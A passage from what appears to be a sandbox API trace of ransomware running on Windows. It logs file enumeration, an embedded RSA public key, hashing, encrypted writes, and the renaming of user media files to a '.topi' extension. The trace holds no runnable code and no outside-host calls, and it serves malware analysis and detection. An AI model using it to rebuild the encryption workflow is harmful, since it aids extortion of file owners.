(HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f58 [0097.727] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0097.727] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f70 [0097.727] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f40 [0097.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4f88 [0097.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a18 [0097.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0097.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0097.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.729] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0097.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f58 | out: hHeap=0x680000) returned 1 [0097.729] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f58 [0097.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.729] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0097.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.729] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0097.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.729] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0097.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0097.729] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0097.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.729] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0097.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f58 | out: hHeap=0x680000) returned 1 [0097.729] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0097.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0097.730] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0097.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0097.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0097.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0097.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0097.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f88 | out: hHeap=0x680000) returned 1 [0097.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f70 | out: hHeap=0x680000) returned 1 [0097.731] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f40 | out: hHeap=0x680000) returned 1 [0097.731] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0097.731] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0097.731] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0097.731] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f28 | out: hHeap=0x680000) returned 1 [0097.731] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fb890 | out: hHeap=0x680000) returned 1 [0097.731] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.731] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0097.731] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0097.731] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0097.731] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0097.731] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.731] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.731] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0097.731] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0097.731] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.731] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0097.732] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x15e47, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x15e47, lpOverlapped=0x0) returned 1 [0097.732] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0097.732] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x15e4c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.732] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0097.732] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0097.732] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.733] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0097.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.733] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0097.733] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.733] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0097.733] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0097.733] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0097.733] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.733] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0097.733] CloseHandle (hObject=0x6a8) returned 1 [0097.735] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b41c0 [0097.735] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x890) returned 0x31cf750 [0097.735] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b41c0 | out: hHeap=0x680000) returned 1 [0097.735] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\kddg-2aSE\\7huE.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\2s0-\\kddg-2ase\\7hue.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\kddg-2aSE\\7huE.mp3.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\2s0-\\kddg-2ase\\7hue.mp3.topi")) returned 1 [0097.735] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.735] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.736] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.737] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6040 | out: hHeap=0x680000) returned 1 [0097.737] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcb8a5b0, ftCreationTime.dwHighDateTime=0x1d5be74, ftLastAccessTime.dwLowDateTime=0x71e2a010, ftLastAccessTime.dwHighDateTime=0x1d5b811, ftLastWriteTime.dwLowDateTime=0x71e2a010, ftLastWriteTime.dwHighDateTime=0x1d5b811, nFileSizeHigh=0x0, nFileSizeLow=0x8422, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="o36gIUh7Ffd1.wav", cAlternateFileName="O36GIU~1.WAV")) returned 1 [0097.737] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.737] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xbe) returned 0x99e6040 [0097.737] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.737] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\kddg-2aSE\\o36gIUh7Ffd1.wav") returned=".wav" [0097.738] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\kddg-2aSE\\o36gIUh7Ffd1.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\2s0-\\kddg-2ase\\o36giuh7ffd1.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.738] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=33826) returned 1 [0097.738] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.741] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x83fc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.741] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.742] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.742] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.742] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.742] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x8422, lpOverlapped=0x0) returned 1 [0097.742] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.743] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0097.743] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.743] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.743] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0097.744] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.744] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.744] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.744] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0097.744] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.744] GetLastError () returned 0x0 [0097.744] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.744] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0097.744] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.744] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.744] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.744] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.744] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.745] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8420) returned 0x9a06a00 [0097.745] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.745] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb890 [0097.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f28 [0097.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb8d8 [0097.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f40 [0097.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f70 [0097.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f88 [0097.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.746] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.746] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f70 | out: hHeap=0x680000) returned 1 [0097.746] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f88 | out: hHeap=0x680000) returned 1 [0097.746] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.746] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.746] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0097.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4f88 [0097.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0097.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4f70 [0097.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0097.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.747] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.747] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f88 | out: hHeap=0x680000) returned 1 [0097.747] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.747] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f70 | out: hHeap=0x680000) returned 1 [0097.747] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.747] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.747] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.747] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.747] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0097.747] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.747] GetCurrentThreadId () returned 0x8c4 [0097.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99fa100 [0097.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0097.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.747] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.748] GetCurrentThreadId () returned 0x8c4 [0097.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.748] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0097.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.748] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.748] RtlAllocateHeap 